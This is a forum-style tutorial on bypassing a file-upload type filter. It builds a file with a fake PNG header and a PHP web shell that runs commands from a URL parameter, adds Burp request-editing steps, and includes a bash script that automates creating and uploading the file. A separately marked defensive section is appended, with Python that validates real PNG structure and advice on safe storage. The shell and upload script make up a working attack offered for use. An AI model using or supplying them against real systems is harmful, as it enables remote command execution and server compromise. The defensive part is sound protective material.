Hi, you have a place to upload files that you can access, but there is a filter making sure that the
file type matches the ones expected (e.g. only image file types).
PNG Image Header
89 50 4E 47
Open a hex editor and create a new file, copy those bytes over to the beginning of the new file. Into the
TEXT area (on the right, not the bytes area where you just pasted the header above) paste your shell
Code:
```php
<?php system($_GET['c']);?>
```
It should look like this
![[Image: Screenshot-2024-05-30-at-20-11-09-File-U...ss-pdf.png]](https://i.ibb.co/JFsThwN/Screenshot-2024-05-30-at-20-11-09-File-Upload-Filter-Bypass-pdf.png)
Take note of the length
![[Image: Screenshot-2024-05-30-at-20-12-59-File-U...ss-pdf.png]](https://i.ibb.co/9vWymtc/Screenshot-2024-05-30-at-20-12-59-File-Upload-Filter-Bypass-pdf.png)
Next, start Burp and navigate to the upload directory.
Then do the following:
1. Turn on the interceptor
2. Send an upload request with any file
3. Modify the request
Original
![[Image: Screenshot-2024-05-30-at-20-14-44-File-U...ss-pdf.png]](https://i.ibb.co/1fMyGpv/Screenshot-2024-05-30-at-20-14-44-File-Upload-Filter-Bypass-pdf.png)
Modified
![[Image: Screenshot-2024-05-30-at-20-15-43-File-U...ss-pdf.png]](https://i.ibb.co/bbXq6QH/Screenshot-2024-05-30-at-20-15-43-File-Upload-Filter-Bypass-pdf.png)
You can automate this request by doing the following
Code:
```bash
#!/bin/bash
# Function to create PNG file with embedded PHP shell
create_embedded_shell_png() {
    echo -n -e "\x89\x50\x4E\x47" > embedded_shell.png
    echo '<?php system($_GET["c"]); ?>' >> embedded_shell.png
}
# Function to calculate file length
get_file_length() {
    file_length=$(stat -c %s embedded_shell.png)
    echo "$file_length"
}
# Function to upload file to server
upload_file() {
    url="http://example.com/upload.php" # Replace with actual upload URL
    file="embedded_shell.png"
    curl -X POST -F "file=@$file" "$url"
}
# Main script
echo "Creating PNG file with embedded PHP shell..."
create_embedded_shell_png
echo "File created successfully."
file_length=$(get_file_length)
echo "File length: $file_length bytes"
echo "Uploading file to server..."
upload_file
echo "File uploaded successfully."
```
For more HQ tutorials leave a like ✅
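From the upload handler's side, the file built above gets through because the filter compares only the first four bytes. The Python below is an added example, not part of the original post: it puts that kind of prefix check next to a structural PNG validation (full 8-byte signature, chunk lengths, CRCs, IHDR first, nothing after IEND). The function names and both sample files are constructed for illustration.

```python
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"  # the full signature is 8 bytes, not 4

def naive_check(data: bytes) -> bool:
    """The kind of filter the post describes: only the first 4 bytes are compared."""
    return data[:4] == b"\x89PNG"

def validate_png(data: bytes) -> tuple:
    """Return (ok, reason); walks every chunk and verifies its CRC."""
    if data[:8] != PNG_SIGNATURE:
        return False, "bad signature"
    pos, first, seen_idat = 8, True, False
    while True:
        if pos + 12 > len(data):  # length(4) + type(4) + crc(4) is the minimum
            return False, "truncated chunk"
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        end = pos + 12 + length
        if end > len(data):
            return False, "chunk length exceeds file"
        body = data[pos + 8:end - 4]
        if zlib.crc32(ctype + body) != struct.unpack(">I", data[end - 4:end])[0]:
            return False, "bad chunk CRC"
        if first and (ctype != b"IHDR" or length != 13):
            return False, "first chunk is not IHDR"
        first, pos = False, end
        seen_idat = seen_idat or ctype == b"IDAT"
        if ctype == b"IEND":
            break
    if not seen_idat:
        return False, "no IDAT chunk"
    if pos != len(data):
        return False, "trailing data after IEND"
    return True, "ok"

def _chunk(ctype: bytes, body: bytes) -> bytes:
    """Helper used only to build the constructed sample below."""
    crc = zlib.crc32(ctype + body)
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)

# Constructed samples: a minimal 1x1 grayscale PNG, and a file laid out as in
# the post (4 header bytes followed by script text; the body is a placeholder).
REAL_PNG = (PNG_SIGNATURE
            + _chunk(b"IHDR", struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0))
            + _chunk(b"IDAT", zlib.compress(b"\x00\x00"))
            + _chunk(b"IEND", b""))
FAKE_PNG = b"\x89PNG" + b"<?php /* placeholder */ ?>\n"
```

Structural validation is one layer only: the upload should also be stored under a server-generated name with a fixed image extension, in a location the web server never hands to the PHP interpreter.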



